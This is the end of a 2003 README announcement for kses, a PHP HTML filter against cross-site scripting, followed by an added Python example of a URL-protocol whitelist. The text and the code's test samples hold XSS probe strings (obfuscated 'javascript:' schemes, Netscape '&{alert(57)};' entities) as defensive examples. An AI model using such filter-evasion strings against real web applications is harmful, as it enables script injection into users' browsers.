Cross-Site Scripting (XSS), Buffer Overflows and Denial of Service attacks,
among other things.

The program is released under the terms of the GNU General Public License. You
should look into what that means, before using kses in your programs.


* FEATURES *


Some of kses' current features are:

* It will only allow the HTML elements and attributes that it was explicitly
told to allow.

* Element and attribute names are case-insensitive (a href vs A HREF).

* It will understand and process whitespace correctly.

* Attribute values can be surrounded with quotes, apostrophes or nothing.

* It will accept attributes with just names and no values (selected).

! It will accept XHTML's closing " /" marks. [new in 0.2.0]

* Attribute values that are surrounded with nothing will get quotes to avoid
producing non-W3C conforming HTML
(<a href=http://sourceforge.net/projects/kses> works but isn't valid HTML).

* It handles lots of types of malformed HTML, by interpreting the existing code
the best it can and then rebuilding new code from it. That's a better approach
than trying to process existing code, as you're bound to forget about some
weird special case somewhere. It handles problems like never-ending quotes and
tags gracefully.

* It will remove additional "<" and ">" characters that people may try to sneak
in somewhere.

! It supports checking attribute values for maximum length and maximum value,
to protect against Buffer Overflows and Denial of Service attacks against WWW
clients and various servers. You can stop <img> from
having too high values for width and height, for instance. [new in 0.2.0]

! It has got a system for white listing URL protocols. You can say that
attribute values may only start with http:, https:, ftp: and gopher:, but no
other URL protocols (javascript:, java:, about:, telnet:..). The functions that
do this work handle whitespace, upper/lower case, HTML entities
("javascript:") and repeated entries ("javascript:javascript:alert(57)").
It also normalizes HTML entities as a nice side effect. [new in 0.2.0]

! It removes Netscape 4's JavaScript entities ("&{alert(57)};"). [new in 0.2.0]

! It handles NULL bytes. [new in 0.2.0]


* DOWNLOAD LOCATION AND MAILING LIST *


If you want to download kses or subscribe to its kses-general mailing list, you
should visit its homepage at http://sourceforge.net/projects/kses .

Security audits, bug reports and patches are highly appreciated, so don't
hesitate to get in touch.


// Ulf Harnhammar, London/Stockholm, July 2003
   metaur at users dot sourceforge dot net
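The protocol white list described in the announcement above (whitespace, upper/lower case, HTML entities, repeated entries, Netscape JavaScript entities and NULL bytes all handled before the scheme is compared), as an added example in Python. This is not kses' own PHP code; the allowed set is the four schemes named in the post, and the function names are hypothetical.

```python
import html
import re

# Allowed URL schemes: the example list from the announcement (assumption).
ALLOWED_PROTOCOLS = ("http", "https", "ftp", "gopher")

# Netscape 4 JavaScript entities look like &{ ... };
_JS_ENTITY_RE = re.compile(r"&\{[^}]*\};")
# Leading "scheme:" of a value: everything before the first ':' that is
# not already a path, query or fragment delimiter.
_SCHEME_RE = re.compile(r"^([^:/?#]*):")
# Whitespace and control characters that browsers skip inside a scheme name.
_IGNORED_RE = re.compile(r"[\s\x00-\x1f]")


def normalize_value(value: str) -> str:
    """Canonicalise an attribute value before it is checked: drop &{...};
    entities, decode HTML entities until the text stops changing (so a
    double-encoded entity cannot hide a scheme), and remove NULL bytes."""
    value = _JS_ENTITY_RE.sub("", value)
    for _ in range(5):  # bounded: each pass peels one layer of encoding
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\0", "")


def strip_bad_protocols(value: str, allowed=ALLOWED_PROTOCOLS) -> str:
    """Remove disallowed leading schemes, repeatedly, so that
    'javascript:javascript:alert(57)' is reduced to 'alert(57)'.
    A value starting with an allowed scheme (case-insensitive) is kept."""
    value = normalize_value(value)
    while True:
        m = _SCHEME_RE.match(value)
        if m is None:
            return value  # relative URL or bare path: no scheme to check
        scheme = _IGNORED_RE.sub("", m.group(1)).lower()
        if scheme in allowed:
            return value
        value = value[m.end():]  # drop "badscheme:" and look again


if __name__ == "__main__":
    # Constructed sample inputs, not taken from the post.
    for sample in ("javascript:javascript:alert(57)", "JaVa\tScRiPt:alert(1)",
                   "&#106;avascript:alert(57)", "java\0script:alert(1)",
                   "&{alert(57)};", "HTTP://sourceforge.net/projects/kses"):
        print(repr(sample), "->", repr(strip_bad_protocols(sample)))
```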
